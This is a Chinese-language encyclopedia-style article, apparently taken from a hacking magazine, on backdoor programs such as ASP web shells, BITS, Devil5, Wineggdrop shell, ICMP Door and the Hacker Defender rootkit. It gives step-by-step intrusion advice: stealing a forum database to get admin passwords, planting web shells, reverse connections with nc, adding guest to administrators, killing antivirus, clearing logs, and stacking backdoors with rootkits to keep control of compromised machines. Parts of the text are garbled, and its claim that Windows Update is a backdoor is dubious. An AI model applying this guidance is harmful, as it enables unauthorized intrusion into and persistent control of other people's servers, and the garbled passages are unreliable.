標籤:bug

後門程序一般是指那些繞過安全性控制而獲取對程序或系統訪問權的程序方法。在軟體的開發階段,程序員常常會在軟體內創建後門程序以便可以修改程序設計中的缺陷。但是,如果這些後門被其他人知道,或是在發布軟體之前沒有刪除後門程序,那麼它就成了安全風險,容易被黑客當成漏洞進行攻擊。

1定義

具體含義
後門程序又稱特洛依木馬,其用途在於潛伏在電腦中,從事搜集信息或便於黑客進入的動作。後門程序和電腦病毒最大的差別,在於後門程序不一定有自我複製的動作,也就是後門程序不一定會「感染」其它電腦。
後門是一種登錄系統的方法,它不僅繞過系統已有的安全設置,而且還能挫敗系統上各種增強的安全設置。
網頁後門
此類後門程序一般都是伺服器上正常 的web服務來構造自己的連接方式,比如非常流行的ASP、cgi腳本後門等。
擴展後門
所謂的「擴展」,是指在功能上有大的提升,比普通的單一功能的後門有很強的使用性,這種後門本身就相當於一個小的安全工具包,能實現非常多的常見安全功能,適合新手使用————但是,功能越強,個人覺得反而脫離了後門「隱蔽」的初衷,具體看法就看各位使用者的喜好了。
基本信息
這是ASP腳本方面流傳非常廣的一個腳本後門了,在經過幾次大的改革后,推出了「海陽頂端ASP木馬XP版」、「海陽頂端ASP木馬紅粉佳人版」等功能強大、使用方便的後門,想必經常接觸腳本安全的朋友對這些都不會陌生。
海陽頂端ASP木馬

  海陽頂端ASP木馬

類型:網頁木馬
使用範圍:支持ASP、WEB訪問
使用難度:★☆☆☆☆
危害程序:★★★☆☆
查殺難度:★★★☆☆
運用舉便
leadbbs2.77曾經風靡網路,它是個很典型的ASP論壇,屏蔽了很多可以SQL注入的寺方,但是很多傻瓜級別的網路管理員總是喜歡默認安裝,然後啟用論壇,我們只需要很簡單地在IE中輸入:WWW。***。COM/BBS/DATA/LEADBBS。MDB就能夠直接下載該論壇的資料庫了,而且沒有MD5加密哦!,我們直接找到管理員的賬戶和密碼,然後登錄論壇,到管理界面將論壇的「聯繫我們」、「幫助」等ASP文件替換成我們的海陽項端代碼,然後執行GUEST許可權的CMD命令,方便的上傳/下載將定程序、遠程執行程序等,這樣一個隱藏的後門就建好了!取得伺服器的SYSTEM許可權就看大家自己的辦法了。
一般來講,海洋的功能是非常強大的,而且不容易被查殺(一個朋友採取的方式是:先利用某個腳本漏洞上傳網頁後門,再通過海洋上傳另一個後門到隱蔽的路徑,然後通過最後上傳的後門來刪除第一次上傳的海洋,這樣後門的存放路徑就可以放得非常深了,普通管理員是很難發現的),如果管理員覺得自己可能中了這裡邊樣的後門,可以利用論壇備份來恢復自己的頁面系統,再配合系統日誌、論壇日誌等程序檢查系統,發現可疑ASP文件打開看看海洋是很好識別的,再刪除就可以了。
腳本方面的後門還有CGI和PHP兩面三刀大類,使用原理都差不多,這裡就不再多介紹,在黑防論壇也收錄了這三種後門,大家可以下載后自己研究。

2線程插入

運用舉例
首先我們用3389登錄上肉雞,確定你有SYSTEM的許可權,將BITS.DLL拷貝到伺服器上,執行CMD命令: 4 #R Br A
rundll32.exebits.dll,install
這樣就激活了BIST,程序用這個特徵的字元來辨認使用者,也就相當於你的密碼了,然後卸載:rundll32.exe BITS.dll,Uninstall
這是最簡單的使用,這個後門除了隱蔽性好外,還有兩大特點是非常 值得借鑒的:埠復用和正反向連接。雖然很多朋友經常聽到這兩個名詞,但並不了解它們,埠復用就是利用系統正常的TCP埠通訊和控制,比如80、139等,這樣的後門有個非常 大的好處就是非常 隱蔽,不用自己開埠也不會暴露自己的訪問,因為通訊本身就是系統的正常訪問!另一個是反向連接,這個很常 見,也是後門中一個經典思路,因為從伺服器上主動方問外邊是不被禁止的,很多很歷害的防火牆就怕這點!
BITS的正向連接很簡單,大家可以參考它的README,這種方式在伺服器沒有防火牆等措施的時候很管用,可以方便地連接,但是遇到有防火牆這樣的方式就不靈了,得使用下面的反向連接方式: 70 +g3l
在本地使用NC監聽(如:nc -l -p 1234)
用NC連接目標主機的任何一個防火牆允許的TCP埠(80/139/445……)
輸入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email] ^q/hQ , 4
目標主機的CMD將會出現NC監聽的埠2222,這樣就實現了繞過防火牆的功能了。

3devil5

運用舉例
道德使用它自帶的配置程序EDITDEVIL5.EXE對後門進行常規的配置,包括控制埠、插入線程、連接密碼、時間間隔等方面關鍵點是對插入線程的定製,一般設置成系統自帶的SVCHOST,然後運行後門就可以控制了。
我們用TELNET連接上去,連接的格式是:TELNET *** 定製的埠,它和其他後門不同之處在於連接后沒有提示的界面,每次執行程序也是分開的,必須要每次都有輸入密碼,比如我們丟掉了伺服器和管賬戶,可以激活GUEST后再將GUEST加到管理員許可權,記得每次執行命令后加上「>密碼」就可以了:net localgroup administrators guest /add >hkfx,然後你又可以控制伺服器了。
很明顯示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通過系統自帶埠通訊、執行命令比較麻煩,需要每次輸入密碼而且不回顯示輸入內容,很容易出錯。但是,它有自己的優勢:插入線程可以自已定製,比如設置IE的線程為插入的目標就比較難被查殺:自己提供了專門的查殺工具DELDEVIL5.exe,幫助防護者清理系統;而且它可以任意改名和綁定,使用靈活性上比BITS強……大家選擇哪能款就看自己的喜好了。
另外,PortLess BackDoor等工具也是此類的後門,功能強大,隱蔽性稍差,大家有興趣可以自己研究一下。

4擴展後門

運用舉例
在安裝後門前,需要使用它自帶的EditServer.exe程序對服務端進行非常詳細的配置,從10個具體配置中,包括了插入線程、密碼、IP登錄郵件通告等方面,不難看出它的功能是非常強大的,隱蔽性也很強,下面說幾個在入侵中常用的功能,相信經常玩入侵的朋友一定能發現它的強大之處:
Fport:列出進程到埠的列表,用於發現系統中運行程序所對應的埠,可以用來檢測常見的隱蔽的後門。
Reboot:重啟系統,如果你上傳並運行了其他後門程序,並需要重啟機器以便讓後門正常工作,那使用這個命令吧! Uz
Shell:得到一個Dos Shell,這個不多講了,直接得到伺服器或者肉雞上的cmd shell。
Pskill PID或程序名:用於殺掉特定的服務,比如殺毒軟體或者是防火牆。
Execute程序:在後台中執行程序,比如sniffer等。http://ip/文件名 保存文件名:下載程序,直接從網上down一個後門到伺服器上。
Installterm埠:在沒有安裝終端服務的win2k服務版的系統中安裝終端服務,重啟系統后才生效,並可以自定義連接埠,比如不用3389而用其他埠。
StopService/StartService:停止或者啟動某個系統服務,比如telnet。
CleanEvent:刪除系統日誌。
Redirect:TCP數據轉發,這個功能是後門程序中非常出色的一個功能,可以通過某一埠的數據轉發來控制內網的機器,在滲透入侵的時候非常管用!
EnumService:列舉所有自動啟動的服務的資料,比如後門、木馬。
RegEdit:進入註冊表操作模式,熟悉註冊表的使用者終於在後門中找到了福音! !
Findpassword:得到所有登錄用戶密碼,比我們常用的findpass功能可強多了。
總體來講,Wineggdrop shell是後門程序中很出彩的一個,它經過作者幾次大規模的修改和升級,已經趨於穩定,功能的強大當然沒得說,但是由於功能太強大,被查殺和懷疑是難以避免的,所以很多人在使用Wineggdrop shell一段時間后就發現肉雞飛了,其實是很正常的事,我你出不用氣餒,其實用很簡單的方法就可以很好地提高它的隱蔽性,下文將有說明。
相對於Wineggdrop shell來說,獨孤劍客的winshell在功能上就不那麼全面了,但是筆者推薦新手更多的使用winshell而不是Wineggdrop shell,因為winshell功能除了獲得一個shell以外,只加入了一些重啟、關閉伺服器的命令,功能相對簡單,但完全使用系統自帶的cmd來執行命令,對系統學習和掌握也是非常有幫助的!
Winshell和wolf這兩者都是國內早期頂尖的後門程序,程序的編製無疑是非常經典的,新手學習時使用這兩款後門一定能讓你明白很多系統相關東西,了解很多入侵思路和方法。

5C/S後門

運用舉例
這個後門其實用途最廣的地方在於突破網關后對內網計算機的控制,因為很多機密數據都是放在內網計算機上的,而控制內網計算機並不是我們想到位的商業網路進行入侵檢測,它的網路內部並不像我們常見的內網那樣非常容易入侵和控制,因為該公司本身涉及到一些網路安全的服務,所以內網個人計算機的防護是很到位的,在嘗試過很多後門后,最後ICMP Door幫我實現了成功的滲透內網!由此筆者開始愛上這個後門。
首先使用icmpsrv.exe -install參數進行後門的安裝,再使用icmpsend.exe IP進行控制,可以用:[http://xxx.xxx.xxx/admin.exe-hkfx.exe]方式下載文件,保存在[url=file://\\system32\]\\system32\[/url]目錄下,文件名為hkfx.exe,程序名前的「-」不能省去,使用[pslist]還可以列出遠程主機的進程名稱和pid,再使用[pskill id]就可以殺進程了,同樣,輸入普通cmd命令,則遠程主機也就執行了相關的命令。 ~HF1 ? %
這個後門是採用的c/s構架,必須要使用icmpsend才能激活伺服器,但是他也有自己的先天不足:後門依靠ICMP進行通訊,經過衝擊波的洗禮后,很少有伺服器還接受ICMP包了,很多都屏蔽掉了它,所以用它來控制伺服器不是一個好辦法,這也是我為什麼用它來控制內網計算機的原因了——內網很少有人屏蔽ICMP包吧?!

6 root kit

如果說上面的後門程序都各有千秋、各有所長的話,它們和經典的root kit 一比簡直就是小巫見大巫了,那究竟什麼樣是root kit呢?
root kit出現於20世紀90年代初,在1994年2月的一篇安全諮詢報告中首先使用了root kit這個名詞。從出現至今,root kit 的技術發展非常迅速,應用越來越廣泛,檢測難度也越來越大。其中釷對SunOS和Linux兩種操作系統的root kit最多。
很多人有一個誤解,他們認為root kit 是用作獲得系統root訪問許可權的工具。實際上,root kit是攻擊都用來隱蔽自己的蹤跡和保留root訪問許可權的工具。通常,攻擊者通過遠程攻擊獲得root訪問許可權,進入系統后,攻擊者會在侵入的主機中安裝root kit,然後他將經常通過root kit的後門檢查系統是否有其他的用戶登錄,如果只有自己,攻擊者就開始著手清理日誌中的有關信息。通過root kit的嗅探器獲得其他系統的用戶和密碼之後,攻擊者就會利用這些信息侵入其他系統。
從*nix系統上遷移到windows系統下的root kit完全沿襲了這些「可怕」的功能!網路上常見的root kit 是內核級後門軟體,用戶可以通過它隱藏文件、進程、系統服、系統驅動、註冊表鍵和鍵值、打開的埠以及虛構可用磁碟窨。程序同時也在內存中偽裝它所做的改動,並且隱身地控制被隱藏進程。程序安裝隱藏後門,註冊隱藏系統服務並且安裝系統驅動。該後門技術允許植入reDirector,是非常難以查殺的一個東東,讓很多網路管員非常頭疼!

7後門軟體

hacker defender
類型:系統後門
使用範圍:win200/xp/2003
隱蔽程度:★★★★★
使用難度:★★★★★
危害程度:★★★★★
查殺難度:★★★★★(呵呵,全部五星,因為它太「霸道」了)
現在最新版本的hxdf是1.0.0,它是從國外傳過來的一個程序,包含兩個關鍵程序,裡面的配置文件ini非常複雜,相信新手使用也是很困難的主要包括:[Hidden Table],[Root Processes],[HiddenServices],[Hidden RegKeys],[Hidden RegValues],[Startup Run],[Free Space],[Hidden pORTS],[Settings]。對功能就是隱藏文件(目錄)、隱藏進程、隱蔽服務、隱藏註冊鍵、隱藏註冊表鍵值、啟動程序、增加磁碟剩餘空間、隱藏埠、後門設置,具體配置我們就不具體講解了,本期文章有詳細的介紹,我們說說它的特點(純粹個人觀點和經驗偏激的地方請大家海涵):
  • 後門並不鮮見。
  • 後門的所有可找到東西!這個只能用一個字來形容:牛!比如隱藏文件、服務、註冊表鍵等功能,雖然我們說起來是一句話,想念識貨的朋友應該能發現這中間NB的地方!
  • 後門思維:配合其他擴展型後門使用,效果好得出乎你的意料!(這是後面的內容,我們馬上講到)。
拋開其他不講,系統中安裝了這樣的root kit,你通過普通的查殺途徑根本檢測不到這個程序這點就非常值得我們利用了!試想:一個在你伺服器上運行的後門,你連看都看不到它,別說查殺了!
註:由於此後門危害太大,所以編輯特別在此掐掉作者一段篇幅,喜歡研究後門程序的朋友可以自己去研究,不過千萬注意不要誤運行了程序,查殺和清除是非常麻煩的事!直接重新安裝系統吧!

8經典思維

很多朋友都在嘗試著開發一些自己的後門程序,他們企圖將非常多的功能加入到後門里恨不得一個後門就是一個操作系統!————很明顯,這樣是不對的!因為一個好的後門能實現非常單一的功能就夠了,它不是給你控制伺服器的,而是給你在丟掉伺服器控制方法的時候用來再次控制伺服器的!所以,不要經常使用後門程序,當然也不要讓你的後門程序太在。 !5NcAo/3?』
所有網路安全工具都存在一個問題:隱藏!隨著廣大網友安全意識的提高,殺毒軟體、系統安全保護程序這些東西再不是「珍品」了,所以,就算你的後門程序能實現兩萬個功能,但是很容易就被殺毒軟體查殺的話,那也是白搭!換句話說:如果別人能很方便地看看進程、查查註冊表、看看埠就能查出系統有問題的話,你這個後門也就算不上好了!所以記住:隱藏才是最重要的! nt) 0Xt4!)
很多朋友都喜歡使用某個功能很強大的後門程序來控制伺服器,雖然很隱蔽,但一旦被殺,那他就只有望著服務哭了,其實只要我們稍微入寬思路就能解決這樣問題:嵌套使用互補的後門程序!這樣一旦一個後門暴露,另一個後門或者幾個後門依然在伺服器——這點說起來很簡單,裡面涉及到很多入侵中的經驗和方法,也涉入到root kit,後文我們會講到。
對網路來說,如果一個網路安全工具被公布,那麼,在很短的時間內這個程序將被安全愛好者傳到網路的任何一個地主!很明顯,這樣程序的存活期很短,不出幾天就被查殺了,所以本文列舉的所有程序都可以在網路上找到(光碟上也有收錄),只是給大家提供一種比較好的思路和介紹,很多的後門是私人使用的。希望大家通過自己的學習也能寫出自己的優秀後門!
通過上面的講解,相信大家對主流的後門程序都有了一事實上程度的了解,由於篇幅關係,本文不可以一個接一個實際的去講解用法和查殺,相信那樣讀者也讀著無聊,編輯審稿后也不能刊登了,具體的使用方法還得靠各位去摸索,下面我們說說經典後門的幾個個人體會。
首先拍拍wtf的馬屁:這小子上次在黑防攻防實驗室上說的那句話:「兄弟們千萬不要拘泥於思維的定式,要知道安全最重要的就是思維的鍛煉和意識的培養,為了鍛煉大家的思維能力,友情提醒一下大家,我們在關卡中有很多的陷阱哦!千萬不要被表面的現象迷惑了!」不要小看了這句話,把這句話放到網路入分和攻擊中,很多思維被發散出來,那是整體層次的提高!就拿我們的後門這方面來講,同樣是上面幾個功能強大的、隱蔽性好的後門,為什麼你裝在肉雞上,不出三天就被查殺了?而別人裝一就一直用得好好的呢?這其中其實就是思維轉換的重要性的體現,下面我們將具體說說後門程序如何才能做的好的思維轉換和特點利用,先來看看普通網友的誤區:
  • 系統漏洞或者其他途徑入侵伺服器,然後上去就是新建一個賬戶,直接添加到管理員許可權,有點意識的還能在賬戶後面加一個$讓別人在CMD無法發現,然後再通過什麼3389、23控制伺服器,汗!這就是你看《黑客防線》的成績?《黑客防線》就這樣教你?難道所有管理員都是白痴?都不知道檢查系統最重要的賬戶?這樣的肉雞1天之內不丟都是個奇迹!
  • 管理員的密碼,給伺服器開放3389等服務……同樣送給這樣的朋友一個字:暈!一個簡單得不能再簡單的netstat -an就能讓你的連接暴露無疑!那時候等著上法庭吧!
  • 內置賬戶並使用它來登錄伺服器,這同樣是一個不可取的方法,根據我的經驗,這樣的肉雞肯定用不長!一兩周就飛掉了!
上面只是一些比較低端的錯誤,相信大家在看了此文後不會現再犯這樣的錯誤,下面我們說說覺的比較安全的入侵后控制肉雞的辦法,如果我今天講的東西能有兩、三句能讓你在以後的入侵和安全防護中記住,那我倍感欣慰了!
普通的入侵過程中,3389當然是大家最喜歡的控制方式,那為什麼就只用3389來單純控制伺服器呢?當別人關掉3389后你怎麼控制呢?所以需要後門,那安裝上普通的經典後門,為什麼我的肉雞還是在很短的時間內飛掉呢?——請注意:任何一個系統管理員都不是白痴!不管你多「黑」,你遠程控制伺服器總沒有別人物理接觸來得方便吧!逼不得已人家拔掉網線、格式化硬碟總能讓你不能控制了吧?!所以,後門的隱蔽性是非常重要的,要讓管理員無法發現系統中有後門就是非常重要的了!
一個好的後門,能實現單一的功能就行了,一定不要經常使用你的後門程序來控制肉雞,這樣你想肉雞不飛都困難,比較好的方法是:
3389/23+擴展型後門+rootkit
這是到目前為止最經典的一種後門搭配方式,它幾方面的優點顯示而易見:對方發現不明ip連接的時候肯定會檢查系統問題,改system密碼,清理賬戶是不可避免了,進而管理員對系統的漏洞進行一次常規升級和檢測,補上最開始被入我們入侵的漏洞,這樣如果沒有後門,再進來就很難了。
通常這樣情況下管理員會考慮系統中是不是存在後門,使用常見的殺毒軟體,安全程序來檢測系統,發現後門立即查殺,所以在這裡後門的隱蔽性非常重要,一時被殺,game over!所以這裡定要選擇一些比較難查殺或者是加過殼的後門,上面介紹的後門就是不錯的選擇,線程插入式是比較難被殺掉的。
在這樣基礎上,如果他發現系統中某個程序總是在對網路連接,或者是某個埠總是有人連接在上面,管理員肯定會想辦法kill掉這個程序,所以普通後門再隱藏得好也是會被查殺的,這也是大多數朋友的疑惑了,在這裡就需要使用rootkit了!
如果從系統級隱藏掉服務名、進、埠、註冊表值、啟動項目、程序名,那想信普通的殺毒程序、安全工具要查出系統中的後門程序是很難的!而這點,才是後門程序的精華所在:隱藏!這樣的功能,絕對不是某個後門程序單一使用能實現!而rootkit和上面介紹的一系列後門中的精品就是你最好的選擇!多嘗試,想念你一定找到這個經典搭配中的優勢的!退一萬步講,如果這樣控制的肉雞飛掉了,奉勸大家還是少玩為妙,免得惹火上身哦!

9著名後門

Windows Update

  Windows Update

最著名的後門程序,該算是微軟的Windows Update了。Windows Update的動作不外乎以下三個:開機時自動連上微軟的網站,將電腦的現況報告給網站以進行處理,網站通過Windows Update程序通知使用者是否有必須更新的文件,以及如何更新。如果我們針對這些動作進行分析,則「開機時自動連上微軟網站」的動作就是後門程序特性中的「潛伏」,而「將電腦現況報告」的動作是「搜集信息」。因此,雖然微軟「信誓旦旦」地說它不會搜集個人電腦中的信息,但如果我們從Windows Update來進行分析的話,就會發現它必須搜集個人電腦的信息才能進行操作,所差者只是搜集了哪些信息而已。

相關評論

同義詞:暫無同義詞